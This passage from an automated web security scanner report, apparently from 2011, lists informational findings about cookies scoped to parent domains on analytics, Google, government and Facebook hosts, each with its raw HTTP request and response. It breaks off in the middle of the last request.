13.88. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s22238083938136

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s22238083938136 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0069[CE]; Expires=Thu, 28 Apr 2016 12:28:25 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:25 GMT
Last-Modified: Sun, 01 May 2011 12:28:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www393
Content-Length: 0
Content-Type: text/plain
Connection: close


13.89. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s25464643554296

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s25464643554296 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0068[CE]; Expires=Thu, 28 Apr 2016 12:28:24 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:24 GMT
Last-Modified: Sun, 01 May 2011 12:28:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www65
Content-Length: 0
Content-Type: text/plain
Connection: close


13.90. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s27148967052344

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s27148967052344 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0069[CE]; Expires=Thu, 28 Apr 2016 12:28:25 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:25 GMT
Last-Modified: Sun, 01 May 2011 12:28:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www47
Content-Length: 0
Content-Type: text/plain
Connection: close


13.91. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s2762329166755

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s2762329166755 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0069[CE]; Expires=Thu, 28 Apr 2016 12:28:25 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:25 GMT
Last-Modified: Sun, 01 May 2011 12:28:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www272
Content-Length: 0
Content-Type: text/plain
Connection: close


13.92. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s27866187379695

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s27866187379695 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC006A[CE]; Expires=Thu, 28 Apr 2016 12:28:26 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:26 GMT
Last-Modified: Sun, 01 May 2011 12:28:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www357
Content-Length: 0
Content-Type: text/plain
Connection: close


13.93. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s29011461706832

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s29011461706832 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC006C[CE]; Expires=Thu, 28 Apr 2016 12:28:28 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:28 GMT
Last-Modified: Sun, 01 May 2011 12:28:28 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www393
Content-Length: 0
Content-Type: text/plain
Connection: close


13.94. http://video.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sat, 30 Apr 2011 12:28:59 GMT
Expires: Sat, 30 Apr 2011 12:28:59 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=aa53f114bad92363:TM=1304166539:LM=1304166539:S=sWGUABUiniWwp-c6; expires=Mon, 29-Apr-2013 12:28:59 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...

13.95. http://www.access-board.gov/sec508/guide/1194.22.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.access-board.gov
Path:   /sec508/guide/1194.22.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sec508/guide/1194.22.htm HTTP/1.1
Host: www.access-board.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 55998
Content-Type: text/html
Content-Location: http://www.access-board.gov/sec508/guide/1194.22.htm
Last-Modified: Wed, 27 Jan 2010 21:37:51 GMT
Accept-Ranges: bytes
ETag: "7c1f69fa989fca1:509"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 21:18:50 GMT
Set-Cookie: citrix_ns_id=Zgui1utT27BXb/Ec47m6xQxtGGwA0; Domain=.access-board.gov; Path=/; HttpOnly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Web-based Intranet and Internet Information and Applications (1194.22)</t
...[SNIP]...

13.96. http://www.facebook.com/TeamHaslam  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /TeamHaslam

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TeamHaslam HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=Pi-Op; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.9.128
Connection: close
Date: Sat, 30 Apr 2011 12:32:13 GMT
Content-Length: 135590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

13.97. http://www.facebook.com/WSDOL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WSDOL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WSDOL HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=IdulS; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.231.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:14 GMT
Content-Length: 165238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

13.98. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Mon, 30-May-2011 12:32:06 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.248.108
Connection: close
Date: Sat, 30 Apr 2011 12:32:06 GMT
Content-Length: 0


13.99. http://www.facebook.com/note.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /note.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /note.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=DNT-Q; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.234.113
Connection: close
Date: Sat, 30 Apr 2011 12:32:06 GMT
Content-Length: 13344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.100. http://www.facebook.com/ohiodivisionofwatercraft  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ohiodivisionofwatercraft

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ohiodivisionofwatercraft HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=-xzbm; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.238.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:07 GMT
Content-Length: 45188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

13.101. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Austin-TX/Texasgov/117263931626845

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Austin-TX/Texasgov/117263931626845 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/Texasgov/117263931626845
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=rq3rc; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.248.121
Connection: close
Date: Sat, 30 Apr 2011 12:32:08 GMT
Content-Length: 0


13.102. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/WildlifeResourcesDivisionGADNR
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=0Ak4_; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.11.117
Connection: close
Date: Sat, 30 Apr 2011 12:32:08 GMT
Content-Length: 0


13.103. http://www.facebook.com/pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680 HTTP/1.1
Host: www.facebook.com
Accept: */*
